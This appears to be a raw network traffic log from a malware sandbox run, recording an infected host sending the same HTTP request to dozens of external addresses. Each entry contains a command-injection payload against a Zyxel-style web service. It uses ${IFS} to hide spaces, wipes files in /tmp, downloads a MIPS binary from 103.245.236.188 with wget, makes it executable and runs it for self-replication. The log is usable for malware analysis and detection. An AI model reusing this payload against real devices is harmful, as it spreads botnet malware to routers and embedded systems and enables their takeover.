                                    Jan 13, 2024 19:02:45.446959019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7259192.168.2.1339876169.109.161.166443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:45.446990013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7260192.168.2.133504097.50.110.101443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:45.447042942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7261192.168.2.134702417.191.71.252443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:45.447094917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7262192.168.2.1333380154.205.148.202443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:45.447146893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7263192.168.2.1334908131.135.137.94443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:45.447210073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7264192.168.2.1355934216.239.59.63443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:45.447284937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7265192.168.2.1352322176.217.147.204443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:45.447338104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7266192.168.2.1355350188.13.99.216443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:45.447417974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7267192.168.2.1354378210.49.225.85443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:45.447473049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7268192.168.2.1359146125.78.127.137443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:45.447535038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7269192.168.2.1342072107.163.214.12443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:45.447578907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7270192.168.2.135907868.217.159.75443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:45.447633982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7271192.168.2.1335198147.44.42.211443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:45.447679043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7272192.168.2.133521831.156.119.83443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:45.447747946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7273192.168.2.13570508.87.173.93443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:45.447778940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7274192.168.2.1336444191.50.254.237443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:45.447835922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7275192.168.2.1352576152.141.135.197443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:45.447906017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7276192.168.2.1335844154.31.16.32443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:45.447985888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7277192.168.2.135318275.128.247.7443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:45.448048115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7278192.168.2.134895464.188.238.113443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:45.448096991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7279192.168.2.1344934101.183.57.15443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:45.448172092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7280192.168.2.135096212.8.248.197443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:45.448208094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7281192.168.2.1354056135.253.61.132443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:45.448292017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7282192.168.2.134458493.191.157.0443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:45.448363066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7283192.168.2.1355778171.61.236.196443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:45.448434114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7284192.168.2.135493875.63.88.231443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:45.448494911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7285192.168.2.13544562.210.200.55443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:45.448565960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7286192.168.2.1359238221.46.154.8443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:45.448611975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7287192.168.2.1358066199.78.12.142443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:45.448704004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7288192.168.2.1340894166.110.143.142443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:45.448743105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7289192.168.2.135728618.209.178.179443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:45.448791981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7290192.168.2.134004623.179.240.195443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:45.448860884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7291192.168.2.1341826208.191.0.159443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:45.448885918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7292192.168.2.1348138222.185.55.201443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:45.448951006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7293192.168.2.1341886186.34.150.23443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:45.448993921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7294192.168.2.1341038170.253.101.252443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:45.449104071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7295192.168.2.1342486205.63.225.64443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:45.449131012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7296192.168.2.1346274115.187.153.205443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:45.449193001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7297192.168.2.13505521.234.189.212443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:45.449253082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7298192.168.2.135948868.88.218.222443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:45.449295044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7299192.168.2.133872620.172.174.37443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:45.449350119 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7300192.168.2.1342936154.68.137.237443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:45.449440002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7301192.168.2.135585049.140.8.126443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:45.449476004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7302192.168.2.1359082200.40.157.181443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:45.449542999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7303192.168.2.135847619.33.160.36443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:45.449604034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7304192.168.2.1354644195.250.204.91443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:45.449647903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7305192.168.2.1340420223.93.113.132443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:45.449727058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7306192.168.2.1360930171.197.229.201443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:45.449781895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7307192.168.2.1356174143.45.177.194443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:45.449846983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7308192.168.2.1354286222.38.236.196443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:45.449903965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7309192.168.2.135467696.98.229.67443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:45.449984074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7310192.168.2.1344566115.141.39.77443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:45.450082064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7311192.168.2.133796435.159.100.73443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:45.450145006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7312192.168.2.134155053.157.51.17443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:45.450208902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7313192.168.2.133913223.90.21.145443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:45.450306892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7314192.168.2.1351064194.250.161.124443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:45.450366020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7315192.168.2.1346116164.7.150.157443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:45.450440884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7316192.168.2.1335690200.198.138.158443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:45.450516939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7317192.168.2.1346772120.112.94.11443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:45.450577974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7318192.168.2.1354592153.245.141.101443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:45.450654984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7319192.168.2.1356756216.61.196.131443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:45.450725079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7320192.168.2.1347280109.190.237.139443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:45.450814009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    7321192.168.2.1358226175.195.2.105443
                                    TimestampBytes transferredDirectionData
